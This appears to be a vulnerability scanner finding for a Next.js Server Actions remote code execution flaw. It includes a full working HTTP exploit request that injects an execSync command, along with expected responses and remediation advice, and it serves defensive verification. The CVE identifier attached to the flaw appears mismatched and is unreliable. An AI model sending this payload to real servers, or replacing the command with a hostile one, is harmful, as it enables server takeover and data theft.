Next.js Server Actions RCE (CVE-2025-29927) - www.example.com

A critical Remote Code Execution (RCE) vulnerability was detected on www.example.com affecting Next.js applications using Server Actions. This issue (CVE-2025-29927 and related) allows an unauthenticated attacker to exploit prototype pollution in the Server Actions request handling, leading to arbitrary code execution on the server via crafted multipart/form-data requests with Next-Action and X-Nextjs-* headers.

The detection was triggered by a request that injects a malicious _response._prefix payload invoking child_process.execSync, which would execute a command (e.g. powershell -c "40735*41081") and exfiltrate the result via a NEXT_REDIRECT digest. The command could be anything (e.g. reverse shell, data exfiltration, or cryptominer).

• •Full server compromise: Attacker can run arbitrary OS commands as the Node.js process user.
• •No authentication required: The vulnerable endpoint is typically the application root or any Server Action route.
• •Data theft, backdoors, ransomware: Commands can read env files, modify files, or deploy malware.
• •Affected versions: Next.js 15.x and 14.x with Server Actions enabled; fixed in patched releases.

Send the following raw HTTP request. A vulnerable server may respond with a redirect to /login?a=<command_output> or otherwise exhibit command execution.

POST / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 718
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
X-Nextjs-Html-Request-Id: ZrKd3AZSNFsfOT7m5R8ZS
X-Nextjs-Request-Id: jbtwyidk
Accept-Encoding: gzip

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('powershell -c \"40735*41081\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

Expected on vulnerable host: Redirect (307) to a URL containing the output of the injected command (e.g. /login?a=1673503535 if the command was 40735*41081). Expected on patched host: No command execution; normal or error response.

• •Upgrade Next.js to the latest patched version that addresses Server Actions prototype pollution and RCE (check Next.js security advisories and CVE-2025-29927).
• •Disable or restrict Server Actions if upgrade is not immediately possible; restrict Next-Action requests at the edge/WAF level as a temporary mitigation.
• •Monitor for suspicious Next-Action and X-Nextjs-Request-Id requests and block known malicious payloads.